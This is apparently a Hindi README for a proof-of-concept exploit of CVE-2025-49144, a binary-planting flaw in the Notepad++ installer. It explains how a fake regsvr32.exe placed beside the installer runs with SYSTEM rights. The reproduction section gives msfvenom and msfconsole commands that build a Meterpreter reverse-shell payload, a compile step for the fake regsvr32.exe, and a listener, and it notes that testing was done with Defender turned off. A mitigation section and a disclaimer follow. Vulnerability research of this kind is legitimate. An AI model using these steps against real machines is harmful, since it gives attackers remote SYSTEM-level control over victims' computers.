
CVE-2025-49144 PoC सुरक्षा शोधकर्ताओं के लिए परीक्षण और प्रयास करने के लिए।

📌 CVE-2025-49144 एक उच्च-गंभीरता वाली स्थानीय विशेषाधिकार वृद्धि भेद्यता है जो Notepad++ v8.8.1 और उससे पहले के संस्करणों के इंस्टॉलर में पाई गई है। यह भेद्यता इंस्टॉलेशन के दौरान अनियंत्रित निष्पादन योग्य खोज पथ व्यवहार से उत्पन्न होती है, जिससे स्थानीय हमलावर इंस्टॉलर के समान निर्देशिका में दुर्भावनापूर्ण निष्पादन योग्य फ़ाइलें रखकर SYSTEM-स्तरीय विशेषाधिकार प्राप्त कर सकता है।
⚙️ CVE कैसे काम करता है – चरण-दर-चरण:
🧱 1. इंस्टॉलर में क्या गलत हुआ?
Notepad++ इंस्टॉलर (v8.8.2 से पहले) कुछ घटकों को पंजीकृत करने के लिए regsvr32.exe को कॉल करता है — लेकिन यह पूरा पथ (जैसे C:\Windows\System32\regsvr32.exe) दिए बिना ऐसा करता है।
इसके बजाय, यह सिर्फ चलाता है:
regsvr32.exe some_dll
📂 2. विंडोज खोज पथ व्यवहार: जब किसी निष्पादन योग्य को पूर्ण पथ के बिना लॉन्च किया जाता है, तो विंडोज फ़ाइल खोजने के लिए एक विशिष्ट खोज क्रम का उपयोग करता है:
वह फ़ोल्डर जहाँ से एप्लिकेशन लॉन्च किया गया था (जैसे, डाउनलोड)
सिस्टम फ़ोल्डर (System32)
विंडोज फ़ोल्डर
वर्तमान कार्यशील निर्देशिका
PATH पर्यावरण चर में पथ
इसलिए, यदि एक नकली regsvr32.exe को इंस्टॉलर के समान फ़ोल्डर (जैसे, डाउनलोड) में रखा जाता है, तो विंडोज वास्तविक से पहले इसका उपयोग करेगा।
💣 3. शोषण:
- हमलावर एक दुर्भावनापूर्ण regsvr32.exe को वैध Notepad++ इंस्टॉलर के समान फ़ोल्डर (जैसे, पीड़ित के डाउनलोड फ़ोल्डर) में रखता है।
- पीड़ित इंस्टॉलर चलाता है (यह सोचकर कि यह सुरक्षित है)।
- इंस्टॉलर regsvr32.exe को कॉल करता है, लेकिन उसी फ़ोल्डर से दुर्भावनापूर्ण को निष्पादित करता है — SYSTEM विशेषाधिकारों के साथ (क्योंकि इंस्टॉलर आमतौर पर व्यवस्थापक अनुमतियाँ माँगते हैं)।
- हमलावर का पेलोड अब NT AUTHORITY\SYSTEM के रूप में चल रहा है।
⚙️ पुनरुत्पादन के चरण:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=<your-ip> LPORT=4444 -f c > shellcode.txt
x86_64-w64-mingw32-gcc regsvr32_loader.c -o regsvr32.exe -mwindows
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST X.X.X.X
set LPORT 4444
run
नोट: यह एक PoC है इसलिए विंडोज डिफेंडर और रीयल-टाइम सुरक्षा बंद करके परीक्षण किया गया।
✅ शमन
उपयोगकर्ताओं और व्यवस्थापकों को चाहिए:
Notepad++ v8.8.2 या बाद के संस्करण में अपग्रेड करें
सॉफ़्टवेयर इंस्टॉलेशन को विश्वसनीय व्यवस्थापकों तक सीमित रखें
AppLocker, WDAC, या सॉफ़्टवेयर प्रतिबंध नीतियों (SRP) का उपयोग करें:
सुरक्षा टीमों को नियमित रूप से इंस्टॉल पथों का ऑडिट करना चाहिए, लिखने की अनुमतियों की निगरानी करनी चाहिए, और आक्रमण सतह को कम करने के लिए इंस्टॉलर निष्पादन के दौरान व्यवहार का निरीक्षण करना चाहिए।
MIT लाइसेंस — केवल शैक्षिक, अनुसंधान और रक्षात्मक उद्देश्यों के लिए निःशुल्क।
पुल अनुरोधों का स्वागत है — पहचान में सुधार करें, सुविधाएँ जोड़ें, या सुधार सुझाएँ।
यह PoC केवल शैक्षिक और शोध उद्देश्यों के लिए है। इसे अपने जोखिम पर उपयोग करें। लेखक किसी भी दुरुपयोग या हुई क्षति के लिए जिम्मेदार नहीं है।